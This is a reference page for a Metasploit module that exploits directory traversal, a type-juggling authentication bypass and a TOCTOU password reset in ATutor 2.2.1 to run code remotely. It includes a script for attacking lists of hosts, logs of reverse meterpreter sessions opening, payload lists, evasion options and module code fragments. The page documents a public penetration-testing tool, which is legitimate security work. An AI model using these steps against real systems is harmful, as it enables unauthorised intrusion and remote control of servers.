ATutor 2.2.1 Directory Traversal / Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/atutor_filemanager_traversal metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: ATutor 2.2.1 Directory Traversal / Remote Code Execution
Module: exploit/linux/http/atutor_filemanager_traversal
Source code: modules/exploits/linux/http/atutor_filemanager_traversal.rb
Disclosure date: 2016-03-01
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP setup with display_errors set to On, which can be used to allow us to upload a malicious ZIP file. On the web application, a blacklist verification is performed before extraction, however it is not sufficient to prevent exploitation. You are required to login to the target to reach the vulnerability, however this can be done as a student account and remote registration is enabled by default. Just in case remote registration isn't enabled, this module uses 2 vulnerabilities in order to bypass the authentication: 1. confirm.php Authentication Bypass Type Juggling vulnerability 2. password_reminder.php Remote Password Reset TOCTOU vulnerability

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using atutor_filemanager_traversal against a single host

Normally, you can use exploit/linux/http/atutor_filemanager_traversal this way:

msf > use exploit/linux/http/atutor_filemanager_traversal
msf exploit(atutor_filemanager_traversal) > show targets
    ... a list of targets ...
msf exploit(atutor_filemanager_traversal) > set TARGET target-id
msf exploit(atutor_filemanager_traversal) > show options
    ... show and set options ...
msf exploit(atutor_filemanager_traversal) > exploit

Using atutor_filemanager_traversal against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your atutor_filemanager_traversal will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/atutor_filemanager_traversal")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/atutor_filemanager_traversal exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/atutor_filemanager_traversal

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(linux/http/atutor_filemanager_traversal) > show info

       Name: ATutor 2.2.1 Directory Traversal / Remote Code Execution
     Module: exploit/linux/http/atutor_filemanager_traversal
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-03-01

Provided by:
  mr_me <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        The password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /ATutor/         yes       The path of Atutor
  USERNAME                    no        The username to authenticate as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a directory traversal vulnerability in ATutor 
  on an Apache/PHP setup with display_errors set to On, which can be 
  used to allow us to upload a malicious ZIP file. On the web 
  application, a blacklist verification is performed before 
  extraction, however it is not sufficient to prevent exploitation. 
  You are required to login to the target to reach the vulnerability, 
  however this can be done as a student account and remote 
  registration is enabled by default. Just in case remote registration 
  isn't enabled, this module uses 2 vulnerabilities in order to bypass 
  the authentication: 1. confirm.php Authentication Bypass Type 
  Juggling vulnerability 2. password_reminder.php Remote Password 
  Reset TOCTOU vulnerability

References:
  http://www.atutor.ca/
  http://sourceincite.com/research/src-2016-09/
  http://sourceincite.com/research/src-2016-10/
  http://sourceincite.com/research/src-2016-11/
  https://github.com/atutor/ATutor/pull/107

Module Options


This is a complete list of options available in the linux/http/atutor_filemanager_traversal exploit:

msf6 exploit(linux/http/atutor_filemanager_traversal) > show options

Module options (exploit/linux/http/atutor_filemanager_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /ATutor/         yes       The path of Atutor
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/http/atutor_filemanager_traversal exploit:

msf6 exploit(linux/http/atutor_filemanager_traversal) > show advanced

Module advanced options (exploit/linux/http/atutor_filemanager_traversal):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/atutor_filemanager_traversal module can exploit:

msf6 exploit(linux/http/atutor_filemanager_traversal) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/atutor_filemanager_traversal exploit:

msf6 exploit(linux/http/atutor_filemanager_traversal) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/atutor_filemanager_traversal exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/atutor_filemanager_traversal) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Check requires credentials. The target may still be vulnerable. If so, it may be possible to bypass authentication.


Here is a relevant code snippet related to the "Check requires credentials. The target may still be vulnerable. If so, it may be possible to bypass authentication." error message:

84:	    # there is no real way to finger print the target so we just
85:	    # check if we can upload a zip and extract it into the web root...
86:	    # obviously not ideal, but if anyone knows better, feel free to change
87:	    unless datastore['USERNAME'] && datastore['PASSWORD']
88:	      # if we cant login, it may still be vuln
89:	      return Exploit::CheckCode::Unknown 'Check requires credentials. The target may still be vulnerable. If so, it may be possible to bypass authentication.'
90:	    end
91:	
92:	    student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], check = true)
93:	    if !student_cookie.nil? && disclose_web_root
94:	      begin

Unable to upload php code


Here is a relevant code snippet related to the "Unable to upload php code" error message:

189:	    if res && res.code == 302 && res.redirection.to_s.include?('question_db.php')
190:	      return true
191:	    end
192:	
193:	    # unknown failure...
194:	    fail_with(Failure::Unknown, 'Unable to upload php code')
195:	    return false
196:	  end
197:	
198:	  def find_user(cookie)
199:	    res = send_request_cgi({

Unable to find the username!


Here is a relevant code snippet related to the "Unable to find the username!" error message:

209:	    if username
210:	      return username
211:	    end
212:	
213:	    # else we fail, because we dont know the username to login as
214:	    fail_with(Failure::Unknown, 'Unable to find the username!')
215:	  end
216:	
217:	  def type_juggle
218:	    # high padding, means higher success rate
219:	    # also, we use numbers, so we can count requests :p

Unable to exploit the type juggle and bypass authentication


Here is a relevant code snippet related to the "Unable to exploit the type juggle and bypass authentication" error message:

243:	          return cookie
244:	        end
245:	      end
246:	    end
247:	    # if we finish the loop and have no sauce, we cant make pasta
248:	    fail_with(Failure::Unknown, 'Unable to exploit the type juggle and bypass authentication')
249:	  end
250:	
251:	  def reset_password
252:	    # this is due to line 79 of password_reminder.php
253:	    days = (Time.now.to_i / 60 / 60 / 24)

Unable to exploit the TOCTOU and reset the password


Here is a relevant code snippet related to the "Unable to exploit the TOCTOU and reset the password" error message:

272:	    if res && (res.code == 302)
273:	      return pass
274:	    end
275:	
276:	    # if we land here, the TOCTOU failed us
277:	    fail_with(Failure::Unknown, 'Unable to exploit the TOCTOU and reset the password')
278:	  end
279:	
280:	  def login(username, password, check = false)
281:	    hash = Rex::Text.sha1(Rex::Text.sha1(password))
282:	    res = send_request_cgi({

Authentication failed with username <USERNAME>


Here is a relevant code snippet related to the "Authentication failed with username <USERNAME>" error message:

296:	        return cookie
297:	      end
298:	    end
299:	    # auth failed if we land here, bail
300:	    unless check
301:	      fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
302:	    end
303:	    return nil
304:	  end
305:	
306:	  def exploit

Account details are not set, bypassing authentication...


Here is a relevant code snippet related to the "Account details are not set, bypassing authentication..." error message:

309:	      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
310:	      student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
311:	      print_good("Logged in as #{datastore['USERNAME']}")
312:	    # else, we reset the students password via a type juggle vulnerability
313:	    else
314:	      print_status('Account details are not set, bypassing authentication...')
315:	      print_status('Triggering type juggle attack...')
316:	      student_cookie = type_juggle
317:	      print_good("Successfully bypassed the authentication in #{@number} requests !")
318:	      username = find_user(student_cookie)
319:	      print_good("Found the username: #{username} !")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • mr_me <steventhomasseeley[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.